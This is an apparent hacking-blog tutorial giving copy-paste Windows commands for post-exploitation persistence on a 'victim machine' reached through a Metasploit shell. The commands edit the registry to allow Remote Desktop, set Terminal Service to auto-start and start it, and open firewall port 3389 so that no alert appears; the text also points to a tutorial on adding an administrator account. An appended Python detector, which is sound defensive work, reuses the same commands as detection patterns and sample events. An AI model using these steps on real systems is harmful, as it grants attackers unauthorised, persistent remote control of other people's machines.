Heads up: the tutorial is in English, I couldn't be bothered to translate it, lol.
Type : Tips and Trick
Level : Easy
Many people who are learning computer hacking don't much like the command prompt or a terminal. Some of them prefer quick and fast hacking with a nice, friendly interface where you just click here and click there and it is finished.
Today I will write a tip on how to enable remote desktop using the command prompt… (hey! it still uses the command prompt!).. but wait, with this one all you need to do is copy, paste and execute. You can execute the commands in this tutorial from Telnet or a shell you got from a compromised system, etc.
You can read my last two tutorials to better understand this tip:
How to create a simple exploit for Windows 7
How to add user with administrator rights via command prompt
Let's prepare for this easy and simple tip on how to enable remote desktop using the command prompt.
1. Telnet [or] Command Prompt –> with administrative rights
Step by Step :
1. This tip continues from the tutorial about Creating Simple Exploit using Metasploit, so in this case you already have the shell or the command prompt.
2. Type these commands to enable Remote Desktop on the victim machine:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
3. We are not finished yet… we need to start the Terminal Service, because the terminal service is disabled by default.
sc config TermService start= auto
That command makes the terminal service start every time the computer starts.
4. Now we need to start the terminal service for use right now, because the command in the previous step only makes the terminal service start whenever the computer starts and does not start the service itself.
net start Termservice
5. Okay, we're almost done. The next step is to open the port used by Remote Desktop on the firewall, so that no alert pops up when someone connects to the remote desktop server.
netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
The command above makes the firewall accept every packet that comes to port 3389, which is used for Remote Desktop, without an alert.
6. Open a new terminal (Backtrack 5), or use the Remote Desktop Client in Windows (Start –> All Programs –> Accessories –> Remote Desktop Connection). In this tip I will use RDesktop in Backtrack 5 R2.
7. A GUI (Graphical User Interface) will pop up asking for a user name and password.
8. Yes, we're in and have successfully enabled the remote desktop.
Hope it’s useful m8
– You can add the user via the command prompt by following this tutorial about how to add a user with administrative rights via the command prompt.
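From the defender's side, the commands in steps 2 to 5 leave a recognisable trail in process-creation logs. The Python below is an added example, not part of the original tutorial: it matches those command lines and flags any host where several of them occur close together. The event fields (host, ts, cmdline), the stage names and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# One pattern per command in the tutorial, matched against process-creation
# command lines (Event ID 4688 / Sysmon ID 1). Stage names are made up here.
STAGES = {
    "rdp_registry_enable": re.compile(
        r'\breg(\.exe)?"?\s+add\b.*terminal server.*'
        r'(fDenyTSConnections.*/d\s+(0x)?0\b|AllowTSConnections.*/d\s+(0x)?1\b)', re.I),
    "termservice_autostart": re.compile(
        r'\bsc(\.exe)?"?\s+config\s+termservice\b.*start=\s*auto', re.I),
    "termservice_start": re.compile(
        r'\bnet1?(\.exe)?"?\s+start\s+termservice\b', re.I),
    # Also covers the newer "netsh advfirewall firewall add rule" form.
    "firewall_open_3389": re.compile(
        r'\bnetsh(\.exe)?"?\s+.*firewall\b.*\b3389\b', re.I),
}

def classify(cmdline):
    """Return the set of stages that a single command line matches."""
    return {name for name, rx in STAGES.items() if rx.search(cmdline)}

def find_rdp_enablement(events, window_s=600, min_stages=2):
    """Map host -> sorted stages when >= min_stages distinct stages fall in one window."""
    hits = defaultdict(list)
    for ev in events:
        for stage in classify(ev["cmdline"]):
            hits[ev["host"]].append((ev["ts"], stage))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        best = max(({s for t, s in seen[i:] if t - seen[i][0] <= window_s}
                    for i in range(len(seen))), key=len)
        if len(best) >= min_stages:
            alerts[host] = sorted(best)
    return alerts

# Constructed sample events (not real logs). WS-02 sets the value to 1 (RDP off).
SAMPLE_EVENTS = [
    {"host": "WS-01", "ts": 1000, "cmdline": r'reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f'},
    {"host": "WS-01", "ts": 1020, "cmdline": "sc config TermService start= auto"},
    {"host": "WS-01", "ts": 1030, "cmdline": "net start Termservice"},
    {"host": "WS-01", "ts": 1045, "cmdline": 'netsh.exe firewall add portopening TCP 3389 "Remote Desktop"'},
    {"host": "WS-02", "ts": 2000, "cmdline": r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'},
]

if __name__ == "__main__":
    for host, stages in find_rdp_enablement(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: RDP enablement sequence: {', '.join(stages)}")
```

Requiring at least two distinct stages inside the window keeps a lone "net start TermService" from an administrator from raising an alert; tune window_s and min_stages to your environment.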